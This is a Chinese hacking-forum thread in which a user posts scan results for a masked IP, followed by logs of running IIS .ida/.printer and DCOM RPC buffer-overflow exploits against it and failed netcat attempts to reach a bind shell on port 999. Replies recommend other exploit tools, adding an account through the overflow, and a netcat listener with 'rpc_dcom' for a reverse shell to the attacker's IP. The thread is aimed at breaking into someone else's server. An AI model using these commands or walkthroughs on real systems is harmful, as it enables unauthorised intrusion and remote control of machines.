论坛: 菜鸟乐园 标题: 溢出问题,谁能回答我为什么,进来必须回帖!! 复制本贴地址    
作者: tianyecool [tianyecool]    论坛用户   登录
发现 CGI漏洞: /scripts/samples/search/qsumrhit.htw
发现 CGI漏洞: /scripts/samples/search/qfullhit.htw
发现 CGI漏洞: /iissamples/exair/search/qsumrhit.htw
洞: /iissamples/exair/search/qfullhit.htw
发现 CGI漏洞: /null.idq
发现 CGI漏洞: /null.ida
发现 CGI漏洞: /abczxv.htw
发现 CGI漏洞: /default.asp%81
发现 CGI漏洞: /iissamples/issamples/query.asp
发现 CGI漏洞: /msadc/samples/selector/showcode.asp
CGI漏洞"扫描完成, 发现 12.
 
可能存在"IIS .asp映射分块编码远程缓冲区溢出"漏洞
IIS漏洞"扫描完成, 发现 1.

发现 DcomRpc溢出漏洞: 目前windows版本中危害最大的DcomRpc漏洞
Dcom Rpc scan complete.
DcomRpc溢出漏洞"扫描完成, 发现 1.


D:\工具\hack\tools\gongji>ida ***.**.**.** 80 0 999
index server 2 overflow. writen by sunx
    http://www.sunx.org
    for test only, dont used to hack, :p


connecting...
sending...
Now you can telnet to 999 port
good luck :)


D:\工具\hack\tools\gongji>nc -vv ***.**.**.** 999
***.**.**.**: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [***.**.**.**] 999 (?): connection refused
sent 0, rcvd 0: NOTSOCK

D:\工具\hack\tools\gongji>nc -vv ***.**.**.** 999
***.**.**.**: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [***.**.**.**] 999 (?): connection refused
sent 0, rcvd 0: NOTSOCK

D:\工具\hack\tools\gongji>nc -vv ***.**.**.** 999
***.**.**.**: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [***.**.**.**] 999 (?): connection refused
sent 0, rcvd 0: NOTSOCK

D:\工具\hack\tools\gongji>iishack ***.**.**.** 80 0 999
iis5 remote .printer overflow. writen by sunx
    http://www.sunx.org
    for test only, dont used to hack, :p


connecting...
sending...
Now you can telnet to 999 port
good luck :)


D:\工具\hack\tools\gongji>nc -vv ***.**.**.** 999
***.**.**.**: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [***.**.**.**] 999 (?): connection refused
sent 0, rcvd 0: NOTSOCK

D:\工具\hack\tools\gongji>cd dxcom
系统找不到指定的路径。

D:\工具\hack\tools\gongji>cd xdcom

D:\工具\hack\tools\gongji\xdcom>chdcom 1 ***.**.**.**
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM last <hdm [at] metasploit.com>
- last by nic <nic [at] nic0x333@hotmail.com>
-Compiled and recorrected by pingker!
- Using return address of 0x77e22c29
- Exploit appeared to have failed.

D:\工具\hack\tools\gongji\xdcom>chdcom 1 ***.**.**.**
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM last <hdm [at] metasploit.com>
- last by nic <nic [at] nic0x333@hotmail.com>
-Compiled and recorrected by pingker!
- Using return address of 0x77e22c29
- Exploit appeared to have failed.

D:\工具\hack\tools\gongji\xdcom>ping ***.**.**.**

Pinging ***.**.**.** with 32 bytes of data:

Reply from ***.**.**.**: bytes=32 time=217ms TTL=109
Reply from ***.**.**.**: bytes=32 time=217ms TTL=109
Reply from ***.**.**.**: bytes=32 time=219ms TTL=109
Reply from ***.**.**.**: bytes=32 time=220ms TTL=109

Ping statistics for ***.**.**.**:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 217ms, Maximum = 220ms, Average = 218ms


看到了吧,为什么他存在漏洞,我溢出成功,确连接失败呢?好象我的朋友都可以进去,我用的是XP系统~!

地主 发表时间: 08/07 01:29

回复: tianyecool [tianyecool]   论坛用户   登录
我很急啊,没人回答我吗?

B1层 发表时间: 08/07 01:40

回复: yibing [yibing]   论坛用户   登录
可以溢出他的IDQ,用SNAKE IIS溢出就可以!

B2层 发表时间: 08/07 07:11

回复: vishx [vishx]   论坛用户   登录
他溢了不能连接

B3层 发表时间: 08/07 08:38

回复: tianyecool [tianyecool]   论坛用户   登录
谁能告诉我为什么~

B4层 发表时间: 08/07 10:09

回复: vishx [vishx]   论坛用户   登录
我有时也遇到过,反正我是放弃了

B5层 发表时间: 08/07 10:10

回复: tianyecool [tianyecool]   论坛用户   登录
看来无人能解答我问题了

B6层 发表时间: 08/07 11:18

回复: burningice [burningice]   论坛用户   登录
在snake的idq溢出命令中加帐号,再ipc连试试

B7层 发表时间: 08/07 13:15

回复: tianyecool [tianyecool]   论坛用户   登录
加过了啊,可是还是进不去


B8层 发表时间: 08/07 14:30

回复: myback [georgeju]   论坛用户   登录
这问题我也遇到过

我也是跟楼上的楼上的楼上一样做的

B9层 发表时间: 08/07 15:02

回复: iqst [iqst]   论坛用户   登录
ida,idq那些如果不成功,就是误报。没的说,

B10层 发表时间: 08/07 16:16

回复: all528 [all528]   论坛用户   登录
rpc溢出
nc -vv -l -p 端口
rpc_dcom 系统版本 他的IP 你的IP 端口
早上刚试完



[此贴被 小明王(all528) 在 08月07日19时34分 编辑过]

B11层 发表时间: 08/07 19:52

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号